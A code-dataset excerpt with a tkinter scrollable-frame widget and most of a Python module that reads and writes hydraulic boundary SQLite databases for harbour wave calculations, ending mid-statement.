Custom widget capabale of containing many frames(Sub custom widgets)\n# inside a single scrollable Frame containing a parent canvas\nfrom tkinter import *\n\n\nclass ScrollableFrame(Frame):\n def __init__(self, parent, spacing, margin):\n super(ScrollableFrame, self).__init__(parent)\n self.last_end = 0\n self.spacing = spacing\n self.margin = margin\n self.canv = Canvas(self, bg='lightgreen', height='300', width='500', scrollregion=(0, 0, 0, 1000))\n\n # to use scrollbar\n self.scrollbar = Scrollbar(self, orient=\"vertical\", command=self.canv.yview)\n self.canv.configure(yscrollcommand=self.scrollbar.set)\n self.scrollbar.pack(side=\"right\", fill=\"y\")\n\n self.canv.pack()\n self.canv.bind_all(\"\", self.on_mouse_wheel)\n self.frames = []\n\n def insert_frame_end(self, frame):\n self.frames.append(frame)\n frame.update()\n self.canv.create_window((self.margin, self.last_end), window=frame)\n self.last_end+=frame.winfo_reqheight()\n # self.last_end += (self.spacing + frame.winfo_reqheight())\n # total_occupied=len(self.frames)*frame.winfo_reqheight()\n # # total_occupied=sum([x.winfo_reqheight() for x in self.frames])\n # if total_occupied>self.canv.winfo_height():\n # prev = self.canv['scrollregion']\n # print(prev[6])\n # self.canv['scrollregion'] = (0, 0, 0, int(prev[6]) + self.spacing + frame.winfo_reqheight())\n\n def insert_frame_beg(self):\n pass\n\n def on_mouse_wheel(self, event):\n # -1 is for direction inversion\n self.canv.yview_scroll(-1 * (event.delta // 200), \"units\")\n\n def remove_frame(self,frame_object):\n for x in self.frames:\n if x is frame_object:\n x.destroy()\n self.frames.remove(x)\n\n\n\n# root = Tk()\n# sr = ScrollableFrame(root, 100, 60)\n# sr.pack()\n# # Tk.update(fr)\n# # print(fr.winfo_reqheight())\n# for x in range(100):\n# fr = Frame()\n# label = Label(fr, text=\"Hello text\")\n# label.pack()\n# entry = Entry(fr)\n# entry.pack()\n# sr.insert_frame_end(fr)\n#\n# root.mainloop()\n","sub_path":"src/customComponents/Custom_Scrollable_Frame_widget.py","file_name":"Custom_Scrollable_Frame_widget.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"176270085","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on : Tue Jul 11 11:35:04 2017\nAuthor : Guus Rongen\nProject : PR3594.10.00\nDescription :\n\"\"\"\n\nimport logging\nimport os\nimport sqlite3\n\nimport geopandas as gpd\nimport numpy as np\nimport pandas as pd\nfrom shapely.geometry import Point\n\nfrom hbhavens.core import datamodels\n\nlogger = logging.getLogger(__name__)\n\n\ninputvariableids = {\n 1 : \"Discharge Lobith\",\n 2 : \"Discharge Lith\",\n 3 : \"Discharge Borgharen\",\n 4 : \"Discharge Olst\",\n 5 : \"Discharge Dalfsen\",\n 6 : \"Water level Maasmond\",\n 7 : \"Water level IJssel lake\",\n 8 : \"Water level Marker lake\",\n 9 : \"Wind speed\",\n 10 : \"Water level\",\n 11 : \"Wave period\",\n 12 : \"Sea water level\",\n 13 : \"Wave height\",\n 14 : \"Sea water level (u)\",\n 15 : \"Uncertainty water level (u)\",\n 16 : \"Storm surge duration\",\n 17 : \"Time shift surge and tide\",\n}\n\nintputvarabr = {\n \"Discharge Lobith\": 'Q={:05.0f}',\n \"Discharge Lith\": 'Q={:05.0f}',\n \"Discharge Borgharen\": 'Q={:05.0f}',\n \"Discharge Olst\": 'Q={:05.0f}',\n \"Discharge Dalfsen\": 'Q={:05.0f}',\n \"Water level Maasmond\": 'M={:04.2f}',\n \"Water level IJssel lake\": 'M={:04.2f}',\n \"Water level Marker lake\": 'M={:04.2f}',\n \"Wind speed\": 'U={:02.0f}',\n \"Water level\": 'h={:03.1f}',\n \"Sea water level\": 'M={:04.2f}',\n \"Storm surge duration\": 'D={:03.0f}',\n \"Time shift surge and tide\": 'P={:03.0f}',\n \"Wind direction\": 'D={:05.1f}',\n \"ClosingSituationId\": 'K={:02d}',\n}\n\nresultvariableids = {\n 1 : \"h\",\n 2 : \"Hs\",\n 3 : \"Ts\",\n 4 : \"Tp\",\n 5 : \"Tpm\",\n 6 : \"Tm-1,0\",\n 7 : \"Wave direction\"\n}\n\ndef add_to_table(tablename, dataframe, conn):\n\n # First check if table exists\n n = conn.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name=?;\", (tablename,)).fetchall()\n if not np.size(n):\n raise ValueError('Table \"{}\" does not exist'.format(tablename))\n\n # Secondly check if all columns are present in the table\n columns = [r[1] for r in conn.execute(\"PRAGMA TABLE_INFO('{}');\".format(tablename)).fetchall()]\n try:\n dataframe = dataframe[columns]\n except ValueError as err:\n print('The input dataframe does not have the right columns:', err.args)\n\n # Voeg toe aan tabel\n dataframe.to_sql(tablename, conn, if_exists='append', chunksize=100000, index=False)\n\nclass ExportResultTable(datamodels.ExtendedDataFrame):\n\n _metadata = [\n 'hydraulic_loads', 'result_columns', 'input_columns', 'sort_cols', 'settings'\n ]\n\n def __init__(self, mainmodel):\n super(ExportResultTable, self).__init__()\n \n # Links\n self.hydraulic_loads = mainmodel.hydraulic_loads\n self.settings = mainmodel.project.settings\n\n # Link to columns\n self.result_columns = mainmodel.hydraulic_loads.result_columns\n self.input_columns = mainmodel.hydraulic_loads.input_columns\n self.sort_cols = ['Location', 'HydraulicLoadId']\n\n # self.HRDLocations = pd.DataFrame(\n # columns=['HRDLocationId', 'LocationTypeId', 'Name', 'XCoordinate', 'YCoordinate', 'WaterLevelCorrection']\n # )\n\n # self.UncertaintyModelFactor = pd.DataFrame(\n # columns=['HRDLocationId', 'ClosingSituationId', 'HRDResultColumnId', 'Mean', 'Standarddeviation']\n # )\n\n def add_interpolated_results(self, results, column_mapping):\n \"\"\"Method to interpolate results from recalculated water levels\n to original water levels, and add the tow the export dataframe class.\n \n Parameters\n ----------\n results : pandas.DataFrame\n DataFrame with results\n column_mapping : dict\n Dictionary with the translation form column name in dataframe to column name\n in output (database)\n \"\"\"\n if not self.settings['hydraulic_loads']['recalculate_waterlevels']:\n raise ValueError('This function should only be used when waterlevels are recalculated.')\n \n # Check mapping\n if not set(list(column_mapping)).issuperset(set(self.result_columns)):\n raise KeyError(f'Did not get all required columns. Expected: {set(self.result_columns)}, got {set(list(column_mapping))}')\n\n # Interpolate wave conditions on water levels\n interp_results = self.hydraulic_loads.interpolate_wave_conditions(results, column_mapping)\n\n # Empty results\n self.delete_all()\n self.reindex_inplace(columns=interp_results.columns)\n self.set_data(interp_results)\n\n # Check sort columns presence\n for col in self.sort_cols:\n if col not in interp_results.columns.array:\n raise KeyError(f'Results are missing column \"{col}\"')\n\n # Check if there are NaNs in the resulttable\n if self.isnull().any().any():\n raise ValueError('NaN values in result table.')\n\n def add_results(self, results, column_mapping):\n \"\"\"Method to add results from different calculation types to export dataframe.\n \n Parameters\n ----------\n results : pandas.DataFrame\n DataFrame with results\n column_mapping : dict\n Dictionary with the translation form column name in dataframe to column name\n in output (database)\n \"\"\"\n\n # Recalculate water levels\n if self.settings['hydraulic_loads']['recalculate_waterlevels']:\n raise ValueError('This function should not be used when waterlevels are recalculated.')\n\n # Empty results\n self.delete_all()\n self.reindex_inplace(columns=self.sort_cols + self.input_columns + self.result_columns)\n\n # Check mapping\n if not set(list(column_mapping)).issuperset(set(self.result_columns)):\n raise KeyError(f'Did not get all required columns. Expected: {set(self.result_columns)}, got {set(list(column_mapping))}')\n\n for col in self.sort_cols:\n if col not in results.columns.array:\n raise KeyError(f'Results are missing column \"{col}\"')\n \n # Determine what columns in the table match with the required columns\n tablecols = [column_mapping[col] for col in self.result_columns]\n # Add Location and Load columns for sorting\n tablecols += self.sort_cols\n\n # Check if the needed columns are present in the table (check for nan on reindex)\n result_selection = results.reindex(columns=tablecols)\n if result_selection.isnull().any().any():\n columns = ', '.join(result_selection.columns.to_numpy()[result_selection.isnull().any(axis=0)].astype(str).tolist())\n index = result_selection.isnull().any(axis=1).sum()\n raise ValueError(f'NaN values in results. Columns: {columns}, Index: {index}/{len(result_selection)}')\n\n result_selection = result_selection.sort_values(\n by=self.sort_cols).rename(columns={v: k for k, v in column_mapping.items()})\n \n self.loc[:, self.sort_cols + self.result_columns] = result_selection.reset_index(drop=True)\n\n # 2. Add hydraulic loads\n # Only if not recalculated water levels. If recalculated water levels, the original hydraulic loads are used\n # and these are already present in the result from the function 'interpolate_wave_conditions'\n if not self.settings['hydraulic_loads']['recalculate_waterlevels']:\n nlocations = len(self['Location'].unique())\n self.loc[:, self.input_columns] = np.tile(self.hydraulic_loads.sort_index()[self.input_columns].values, (nlocations, 1))\n\n # Check if there are NaNs in the resulttable\n if self.isnull().any().any():\n raise ValueError('NaN values in result table.')\n\n def set_hrdlocationid(self, tab):\n \"\"\"Add HRDLocationId\n \n Parameters\n ----------\n tab : pandas.DataFrame\n DataFrame with 'Naam' and 'HRDLocationId' columns\n \"\"\"\n \n dct = {row.Naam: row.HRDLocationId for row in tab.itertuples()}\n self['HRDLocationId'] = [dct[row.Location] for row in self.itertuples()]\n\nclass HRDio:\n\n def __init__(self, path):\n\n self.path = path\n if not os.path.exists(path):\n raise OSError(f'Path \"{path}\" does not exist.')\n\n self.conn = None\n\n # Get database format\n self._connect()\n columns = [col[1] for col in self.conn.execute('PRAGMA table_info(HydroDynamicData);').fetchall()]\n self.dbformat = 'OS2023' if 'HydraulicLoadId' in columns else 'WBI2017'\n self._close()\n \n def _connect(self):\n self.conn = sqlite3.connect(self.path)\n\n def _close(self):\n self.conn.close()\n\n def remove_locations(self, polygon, exemption=''):\n \"\"\"\n Remove locations and corresponding hydro dynamic data from db\n\n Parameters\n ----------\n polygon : shapely.geometry.Polygon\n Polygon within which the locations are removed\n \n Returns\n -------\n remove_ids : list\n List with the HRDLocationIds of the removed locations\n \"\"\"\n\n if isinstance(exemption, str):\n exemption = [exemption]\n\n # Get locations\n self._connect()\n remove_ids = []\n sql = f'SELECT HRDLocationId, Name, XCoordinate, YCoordinate FROM HRDLocations;'\n locations = self.conn.execute(sql)\n for locid, name, x, y in locations:\n if polygon.intersects(Point(x, y)):\n if name in exemption:\n logger.warning('The support location is in the harbor bounds, but will not be removed.')\n continue\n remove_ids.append(locid)\n remove_id_str = ','.join(map(str, remove_ids))\n \n if self.dbformat == 'WBI2017':\n # Collect HydroDynamicDataIds\n sql = f'SELECT HydroDynamicDataId FROM HydroDynamicData WHERE HRDLocationId IN ({remove_id_str});'\n data_ids = self.conn.execute(sql).fetchall()\n data_id_str = ','.join(str(i[0]) for i in data_ids)\n\n # Delete from HRDLocations and UncertaintyModelFactor\n for table in ['HRDLocations', 'UncertaintyModelFactor']:\n self.conn.execute(f'DELETE FROM {table} WHERE HRDLocationId IN ({remove_id_str});')\n\n # Delete from HydroDynamicData, HydroDynamicInputData and HydroDynamicResultData\n for table in ['HydroDynamicData', 'HydroDynamicInputData', 'HydroDynamicResultData']:\n self.conn.execute(f'DELETE FROM {table} WHERE HydroDynamicDataId IN ({data_id_str});')\n\n if self.dbformat == 'OS2023':\n # Delete from HRDLocations, UncertaintyModelFactor and HydroDynamicResultData\n for table in ['HRDLocations', 'UncertaintyModelFactor', 'HydroDynamicResultData']:\n self.conn.execute(f'DELETE FROM {table} WHERE HRDLocationId IN ({remove_id_str});')\n\n self.conn.commit()\n self._close()\n\n return remove_ids\n\n def get_track_id(self):\n self._connect()\n systemid = self.conn.execute('SELECT TrackID FROM General;').fetchone()[0]\n self._close()\n return systemid\n\n def get_system_id(self):\n self._connect()\n systemid = self.conn.execute('SELECT GeneralId FROM General;').fetchone()[0]\n self._close()\n return systemid\n\n def get_type_of_hydraulic_load_id(self):\n \"\"\"\n Get type of hydraulic data\n \"\"\"\n self._connect()\n resultvariables = np.hstack(self.conn.execute('SELECT ResultVariableId FROM HRDResultVariables;').fetchall())\n self._close()\n\n # TypeOfHydraulicData Water level or Wave data\n if (1 in resultvariables) and (2 in resultvariables):\n # Wave and Water level\n TypeOfHydraulicDataId = 2\n elif (1 in resultvariables):\n # Water level\n TypeOfHydraulicDataId = 1\n else:\n # Wave data\n TypeOfHydraulicDataId = 3\n\n return TypeOfHydraulicDataId\n\n def get_max_hrdlocation_id(self):\n self._connect()\n maxhrdlocid = self.conn.execute('SELECT MAX(HRDLocationId) FROM HRDLocations;').fetchone()[0]\n self._close()\n return maxhrdlocid\n\n def add_hrd_locations(self, locations):\n \"\"\"\n Function to prepare a HRDLocations table for export, from a geopandas\n GeoDataFrame\n\n Parameters\n ----------\n locations : geopandas.GeoDataFrame\n GeoDataFrame with data to export\n \"\"\"\n\n self._connect()\n # Create empty dataframe with columns from db table\n columns = [col[1] for col in self.conn.execute('PRAGMA table_info(HRDLocations);').fetchall()]\n HRDLocations = pd.DataFrame(columns=columns)\n\n # Fill dataframe\n HRDLocations[['Name', 'HRDLocationId']] = locations[['Exportnaam', 'HRDLocationId']]\n HRDLocations[['XCoordinate', 'YCoordinate']] = [list(pt.coords[0]) for pt in locations['geometry']]\n HRDLocations[['XCoordinate', 'YCoordinate']] = HRDLocations[['XCoordinate', 'YCoordinate']].round(3)\n HRDLocations['WaterLevelCorrection'] = 0.0\n HRDLocations['LocationTypeId'] = 2\n\n if 'Acceptatie geometrie' in columns:\n HRDLocations['Acceptatie geometrie'] = 1\n\n # Add to database\n add_to_table('HRDLocations', HRDLocations, self.conn)\n\n self.conn.commit()\n self._close()\n \n def add_hydro_dynamic_data(self, resultdata, supportlocid=None):\n \"\"\"\n Export HydroDynamicData to database\n\n Parameters\n ----------\n locations : geopandas.GeoDataFrame\n GeoDataFrame with data to export\n resultdata : pandas.DataFrame\n Resultdata to be transformed and exported\n \"\"\"\n\n self._connect()\n if self.dbformat == 'WBI2017':\n # Add max value to HydroDynamicDataId\n max_hddid = self.conn.execute('SELECT MAX(HydroDynamicDataId) FROM HydroDynamicData;').fetchone()[0]\n resultdata.loc[:, 'HydroDynamicDataId'] = np.arange(len(resultdata)) + 1 + max_hddid\n\n # HydroDynamicData\n #-------------------------------------------------------------\n HydroDynamicData = resultdata.reindex(columns=['HydroDynamicDataId', 'ClosingSituationId', 'HRDLocationId', 'Wind direction'])\n # Transform wind directions\n winddirection_conv = {k: v for k, v in self.conn.execute('SELECT Direction, HRDWindDirectionId FROM HRDWindDirections').fetchall()}\n HydroDynamicData.loc[:, 'HRDWindDirectionId'] = [winddirection_conv[wd] for wd in HydroDynamicData['Wind direction'].array]\n # If ClosingSituationId not present in resultdata, set to 1.\n if pd.isnull(HydroDynamicData['ClosingSituationId']).all():\n HydroDynamicData.loc[:, 'ClosingSituationId'] = 1\n # Add to database\n add_to_table('HydroDynamicData', HydroDynamicData, self.conn)\n\n # HydroDynamicInputData\n #-------------------------------------------------------------\n HRDInputVariables = pd.read_sql('SELECT * FROM HRDInputVariables;', self.conn)\n HydroDynamicInputData = resultdata[['HydroDynamicDataId'] + [inputvariableids[ivid] for ivid in HRDInputVariables['InputVariableId'].array]]\n HydroDynamicInputData.columns = ['HydroDynamicDataId'] + HRDInputVariables['HRDInputColumnId'].tolist()\n HydroDynamicInputData.set_index('HydroDynamicDataId', inplace=True)\n HydroDynamicInputData = pd.DataFrame(HydroDynamicInputData.stack()).reset_index()\n HydroDynamicInputData.columns = ['HydroDynamicDataId', 'HRDInputColumnId', 'Value']\n # Add to database\n add_to_table('HydroDynamicInputData', HydroDynamicInputData, self.conn)\n\n # HydroDynamicResultData\n #-------------------------------------------------------------\n HRDResultVariables = pd.read_sql('SELECT * FROM HRDResultVariables;', self.conn)\n # Selecteer result data met algemene kolombenaming\n resultcolumns = ['HydroDynamicDataId'] + [resultvariableids[rvid] for rvid in HRDResultVariables['ResultVariableId'].array]\n #TODO: Make nice division bewteen zoet and zout\n if 'h' in resultcolumns and 'h' not in resultdata.columns:\n resultdata.rename(columns={'Water level': 'h'}, inplace=True)\n HydroDynamicResultData = resultdata[resultcolumns]\n\n # Converteer kolombenaming naar HRDResultColumnId\n HydroDynamicResultData.columns = ['HydroDynamicDataId'] + HRDResultVariables['HRDResultColumnId'].tolist()\n HydroDynamicResultData.set_index('HydroDynamicDataId', inplace=True)\n HydroDynamicResultData = pd.DataFrame(HydroDynamicResultData.stack()).reset_index()\n HydroDynamicResultData.columns = ['HydroDynamicDataId', 'HRDResultColumnId', 'Value']\n # Add to database\n add_to_table('HydroDynamicResultData', HydroDynamicResultData, self.conn)\n\n elif self.dbformat == 'OS2023':\n # For OS2023 only the HydroDynamicResultData table needs to be filled,\n # since the HydroDynamicData and HydroDynamicInputData are location independend\n HydroDynamicResultData = resultdata.set_index(['HRDLocationId', 'HydraulicLoadId'])\n \n # Convert resultvariables to id's\n result_var_conv = {v: k for k, v in self.conn.execute('SELECT HRDResultColumnId, ColumnName FROM HRDResultVariables;').fetchall() if v != 'ZWL'}\n HydroDynamicResultData = HydroDynamicResultData.loc[:, list(result_var_conv)].copy()\n HydroDynamicResultData.columns = [result_var_conv[var] for var in HydroDynamicResultData.columns]\n\n # Stack, add index to columns and rename columns\n HydroDynamicResultData = HydroDynamicResultData.stack().reset_index()\n HydroDynamicResultData.columns = ['HRDLocationId', 'HydraulicLoadId', 'HRDResultColumnId', 'Value']\n \n # Add to database\n add_to_table('HydroDynamicResultData', HydroDynamicResultData, self.conn)\n\n # Now the water levels (ZWL) have to be copied to the result locations\n zwl = pd.read_sql(f'SELECT HydraulicLoadId, HRDResultColumnId, Value FROM HydroDynamicResultData WHERE HRDLocationId={supportlocid} AND HRDResultColumnId=1;', con=self.conn)\n hrdlocationids = HydroDynamicResultData['HRDLocationId'].unique()\n zwl = pd.concat([zwl.assign(HRDLocationId=hrdid) for hrdid in hrdlocationids], ignore_index=True)\n add_to_table('HydroDynamicResultData', zwl, self.conn)\n\n\n else:\n raise ValueError('Format \"{}\" not understood.'.format(self.dbformat))\n\n self.conn.commit()\n self._close()\n\n def add_uncertainty_model_factor(self, locations, uncertainties):\n \"\"\"\n Export UncertaintyModelFactor to database\n\n Parameters\n ----------\n locations : geopandas.GeoDataFrame\n GeoDataFrame with data to export\n uncertainties : pandas.DataFrame\n Uncertainty data to be transformed and exported\n conn : sqlite3.connection\n Connection to HRD\n \"\"\"\n self._connect()\n # Select required locations from uncertainty data\n uncertainties = uncertainties.loc[locations['Naam'], :]\n # Replace name with HRDLocationId\n uncertainties.index = [locations.set_index('Naam').loc[name, 'HRDLocationId'] for name in uncertainties.index]\n # Convert column names\n uncertainties.columns = pd.MultiIndex.from_tuples([tuple(col.replace('mu', 'Mean').replace('sigma', 'Standarddeviation').split()) for col in uncertainties.columns])\n uncertainties = uncertainties.stack()\n # get closing situations id\n csids = np.stack(self.conn.execute('SELECT DISTINCT(ClosingSituationId) FROM ClosingSituations;').fetchall()).tolist()\n # Stack uncertainties dataframe for each ClosingSituationId\n if isinstance(csids, (int, np.int)):\n UncertaintyModelFactor = uncertainties.reset_index()\n UncertaintyModelFactor['ClosingSituationId'] = csids\n else:\n UncertaintyModelFactor = pd.concat([uncertainties]*len(csids)).reset_index()\n UncertaintyModelFactor['ClosingSituationId'] = np.repeat(csids, len(uncertainties))\n UncertaintyModelFactor.columns = ['HRDLocationId', 'HRDResultColumnId'] + UncertaintyModelFactor.columns[2:].tolist()\n # Replace HLCD names with HLCD id (HRDResultColumnId now contains the ResultVariableIds)\n UncertaintyModelFactor['HRDResultColumnId'].replace({v: k for k, v in resultvariableids.items()}, inplace=True)\n # Replace result variable ids with column ids\n HRDResultVariables = pd.read_sql('SELECT * FROM HRDResultVariables;', self.conn)\n # Create a dictionary to convert Result Variable Id to Result Column Id\n hlcdid_hrdcol_dict = HRDResultVariables.set_index('ResultVariableId')['HRDResultColumnId'].to_dict()\n # Select only the values in the table that are present in the HRDResultVariables keys.\n # Note that this is only needed when different database set-ups are combines in HB Havens\n UncertaintyModelFactor = UncertaintyModelFactor.loc[np.in1d(UncertaintyModelFactor['HRDResultColumnId'], list(hlcdid_hrdcol_dict.keys()))]\n # Replace (HRDResultColumnId now contains the HRDResultColumnId)\n UncertaintyModelFactor['HRDResultColumnId'].replace(hlcdid_hrdcol_dict, inplace=True)\n # Sort values\n UncertaintyModelFactor.sort_values(by=['HRDLocationId', 'ClosingSituationId', 'HRDResultColumnId'], inplace=True)\n # Add to database\n add_to_table('UncertaintyModelFactor', UncertaintyModelFactor, self.conn)\n self.conn.commit()\n self._close()\n\n def read_HydroDynamicData(self, hrdlocationid):\n \"\"\"\n Reads hydro dynamic data from database.\n Depending on the format of the database, this function uses for the\n function \"read_HydroDynamicData_2017\" for WBI2017 databases, and the\n function \"read_HydroDynamicData_2023\" for WBI2023 (pilot) databases. It\n thus first determines with which type we are dealing.\n\n Parameters\n ----------\n conn : sqlite3.connection\n Open connection to database\n hrdlocationid : integer\n integer with the locationid of the location\n \"\"\"\n\n self._connect()\n\n if self.dbformat == 'OS2023':\n data = self.read_HydroDynamicData_2023(hrdlocationid)\n elif self.dbformat == 'WBI2017':\n data = self.read_HydroDynamicData_2017(hrdlocationid)\n else:\n raise ValueError(f'Database \"{self.dbformat}\" format not known.')\n\n self._close()\n\n return data\n\n\n def read_HydroDynamicData_2017(self, hrdlocationid):\n \"\"\"\n Reads hydro dynamic data for a location (input and results)\n \"\"\"\n\n if not isinstance(hrdlocationid, (int, np.integer)):\n raise TypeError('must be int, not {}'.format(type(hrdlocationid)))\n\n # First collect the dataids. Also replace wind direction ids with real ids\n SQL = \"\"\"\n SELECT D.HydroDynamicDataId, D.ClosingSituationId, W.Direction AS \"Wind direction\"\n FROM\n HydroDynamicData D INNER JOIN HRDWindDirections W ON D.HRDWindDirectionId=W.HRDWindDirectionId\n WHERE HRDLocationId = {};\"\"\".format(int(hrdlocationid))\n\n dataids = pd.read_sql(SQL, self.conn, index_col='HydroDynamicDataId')\n dataidsstr = ','.join(dataids.index.values.astype(str).tolist())\n\n # Collect the result data. Replace HRDResultColumnId with variable id's\n SQL = \"\"\"\n SELECT RD.HydroDynamicDataId, RV.ResultVariableId, RD.Value\n FROM\n HydroDynamicResultData RD INNER JOIN HRDResultVariables RV ON RD.HRDResultColumnId = RV.HRDResultColumnId\n WHERE HydroDynamicDataId IN ({});\"\"\".format(dataidsstr)\n\n resultdata = pd.read_sql(SQL, self.conn, index_col=['HydroDynamicDataId', 'ResultVariableId']).unstack()\n # Reduce columnindex to single level index (without 'Value')\n resultdata.columns = [resultvariableids[rid] for rid in resultdata.columns.get_level_values(1)]\n \n # Collect inputdata in a similar way\n SQL = \"\"\"\n SELECT ID.HydroDynamicDataId, IV.InputVariableId, ID.Value\n FROM\n HydroDynamicInputData ID INNER JOIN HRDInputVariables IV ON ID.HRDInputColumnId = IV.HRDInputColumnId\n WHERE HydroDynamicDataId IN ({});\"\"\".format(dataidsstr)\n\n inputdata = pd.read_sql(SQL, self.conn, index_col=['HydroDynamicDataId', 'InputVariableId']).unstack()\n # Reduce columnindex to single level index (without 'Value')\n inputdata.columns = [inputvariableids[iid] for iid in inputdata.columns.get_level_values(1)]\n\n # Join data and sort values\n data = dataids.join(inputdata).join(resultdata)\n \n # Sort\n data.sort_values(by=dataids.columns.tolist() + inputdata.columns.tolist(), inplace=True)\n logger.info(f'Loaded hydraulic loads in WBI2017 format from {self.path}.')\n\n return data\n\n def read_HydroDynamicData_2023(self, hrdlocationid):\n \"\"\"\n Reads hydro dynamic data for a location (input and results) from a\n database with the WBI2023 format.\n \"\"\"\n\n if not isinstance(hrdlocationid, (int, np.integer)):\n raise TypeError('must be int, not {}'.format(type(hrdlocationid)))\n\n # First collect the dataids. Also replace wind direction ids with real ids\n SQL = \"\"\"\n SELECT D.HydraulicLoadId, D.ClosingSituationId, W.Direction AS \"Wind direction\"\n FROM\n HydroDynamicData D INNER JOIN HRDWindDirections W ON D.HRDWindDirectionId=W.HRDWindDirectionId;\"\"\"\n\n\n dataids = pd.read_sql(SQL, self.conn, index_col='HydraulicLoadId')\n dataidsstr = ','.join(dataids.index.drop_duplicates().values.astype(str).tolist())\n\n # Collect the result data. Replace HRDResultColumnId with variable id's\n SQL = \"\"\"\n SELECT RD.HydraulicLoadId, RV.ResultVariableId, RD.Value\n FROM\n HydroDynamicResultData RD INNER JOIN HRDResultVariables RV ON RD.HRDResultColumnId = RV.HRDResultColumnId\n WHERE HydraulicLoadId IN ({}) AND HRDLocationId = {};\"\"\".format(dataidsstr, hrdlocationid)\n\n resultdata = pd.read_sql(SQL, self.conn, index_col=['HydraulicLoadId', 'ResultVariableId']).unstack()\n # Reduce columnindex to single level index (without 'Value')\n resultdata.columns = [resultvariableids[rid] for rid in resultdata.columns.get_level_values(1)]\n\n # Collect inputdata in a similar way\n SQL = \"\"\"\n SELECT ID.HydraulicLoadId, IV.InputVariableId, ID.Value\n FROM\n HydroDynamicInputData ID INNER JOIN HRDInputVariables IV ON ID.HRDInputColumnId = IV.HRDInputColumnId\n WHERE HydraulicLoadId IN ({});\"\"\".format(dataidsstr)\n\n inputdata = pd.read_sql(SQL, self.conn, index_col=['HydraulicLoadId', 'InputVariableId']).unstack()\n\n # Reduce columnindex to single level index (without 'Value')\n inputdata.columns = [inputvariableids[iid] for iid in inputdata.columns.get_level_values(1)]\n\n # Join data and sort values\n data = dataids.join(inputdata).join(resultdata).sort_values(by=['Wind direction', 'Wind speed', 'Water level'])\n\n # In the WBI2023 the water levels and waves are in the same table, but have different input variables\n # this gives empty columns in the loaded output, delete these.\n data.dropna(how='all', axis=1, inplace=True)\n \n # Drop entries without wave parameters\n data = data.loc[~np.isnan(resultdata['Hs'])]\n\n # Set the WBI2017 index name (HydroDynamicDataId) for consistency\n data.index.name = 'HydroDynamicDataId'\n logger.info(f'Loaded hydraulic loads in OS2023 format from {self.path}.')\n\n return data\n\n \n def read_HRDLocations(self):\n \"\"\"\n Reads locations from HRD and converts to geopandas.GeoDataFrame\n \"\"\"\n self._connect()\n\n # Retrieve locations\n loctable = pd.read_sql('SELECT HRDLocationId, XCoordinate, YCoordinate, Name FROM HRDLocations;', self.conn)\n # Create Point geometries\n ptgeometries = [Point(row.XCoordinate, row.YCoordinate) for row in loctable.itertuples()]\n # Construct new table\n locations = gpd.GeoDataFrame(loctable[['HRDLocationId', 'Name', 'XCoordinate', 'YCoordinate']], geometry=ptgeometries)\n locations.index = locations['HRDLocationId']\n\n self._close()\n\n return locations\n\n def read_UncertaintyModelFactor(self, hrdlocationid):\n \"\"\"\n Reads model uncertainties for a location from a database\n\n Parameters\n ----------\n hrdlocationid : int\n Location id of the location where the uncertainties are exported from\n \"\"\"\n\n if not isinstance(hrdlocationid, (int, np.integer)):\n raise TypeError('must be int, not {}'.format(type(hrdlocationid)))\n\n # First collect the dataids. Also replace wind direction ids with real ids\n SQL = \"\"\"\n SELECT\n U.ClosingSituationId, RV.ResultVariableId, U.Mean AS mu, U.Standarddeviation AS sigma\n FROM\n UncertaintyModelFactor U\n INNER JOIN\n HRDResultVariables RV\n ON\n U.HRDResultColumnId = RV.HRDResultColumnId\n WHERE\n U.HRDLocationId = {};\"\"\".format(hrdlocationid)\n\n # Read from database\n self._connect()\n modeluncertainty = pd.read_sql(SQL, self.conn, index_col=['ClosingSituationId', 'ResultVariableId'])\n\n # It is possible that the uncertainties vary per closing situation id\n # At the moment the maximum values are used.\n modeluncertainty = modeluncertainty.groupby(level=1).max()\n\n # Replace HRD result column ids\n modeluncertainty.index = [resultvariableids[iid] for iid in modeluncertainty.index.array]\n\n self._close()\n\n return modeluncertainty\n\n \n def check_element_presence(self, elements, column, table):\n \"\"\"\n Count the number of occurences of an element in a table\n \"\"\"\n if not isinstance(elements, list):\n raise TypeError('Unexpected type. Expected elements to be list.')\n \n self._connect()\n elementstr = ','.join(map(str, elements))\n sql = f'SELECT COUNT(*) FROM {table} WHERE {column} IN ({elementstr})'\n count = self.conn.execute(sql).fetchone()[0]\n self._close()\n\n return count\n\n\n\nclass HLCDio:\n\n def __init__(self, path):\n\n self.path = path\n if not os.path.exists(path):\n raise OSError(f'Path \"{path}\" does not exist.')\n\n self.conn = None\n \n def _connect(self):\n self.conn = sqlite3.connect(self.path)\n\n def _close(self):\n self.conn.close()\n\n def remove_locations(self, remove_ids):\n \"\"\"\n Remove locations from HLCD\n\n Parameters\n ----------\n remove_ids : list\n List with LocationIds to be removes from database, together with\n corresponding data.\n \"\"\"\n self._connect()\n \n # Get LocationIds to remove\n remove_id_str = \",\".join(map(str, remove_ids))\n sql = f'SELECT LocationId FROM Locations WHERE HRDLocationId IN ({remove_id_str});'\n remove_hlcd_ids = np.hstack(self.conn.execute(sql).fetchall())\n if not any(remove_hlcd_ids):\n self.conn.close()\n return None\n\n remove_id_str = ','.join(map(str, remove_hlcd_ids))\n sql = f'DELETE FROM Locations WHERE LocationId IN ({remove_id_str});'\n self.conn.execute(sql)\n self.conn.commit()\n self._close()\n\n return remove_hlcd_ids\n\n def get_max_hrdlocation_id(self, systemid=None, trackid=None):\n \"\"\"\n Function to prepare a HRDLocations table for export, from a geopandas\n GeoDataFrame\n\n Parameters\n ----------\n systemid : int\n Id of the water system\n trackid : int\n Id of track\n \"\"\"\n self._connect()\n\n if systemid is not None:\n # Determine the maximum HRDLocationId in the system\n maxlocid = self.conn.execute(\"\"\"\n SELECT MAX(HRDLocationId) FROM Locations WHERE (LocationId > ?) AND (LocationId < ?);\n \"\"\", (systemid*100000, (systemid+1)*100000)).fetchone()[0]\n\n if maxlocid is not None:\n descriptive_id = False\n self._close()\n return maxlocid, descriptive_id\n\n if trackid is not None:\n # If not max location ID is found, try looking for the maximum given the trackid\n maxlocid = self.conn.execute('SELECT MAX(HRDLocationId) FROM Locations WHERE TrackId=?;', (trackid,)).fetchone()[0]\n if maxlocid is not None:\n descriptive_id = True\n self._close()\n return maxlocid, descriptive_id\n\n # Else, just find the highest location id in the database\n maxlocid = self.conn.execute('SELECT MAX(HRDLocationId) FROM 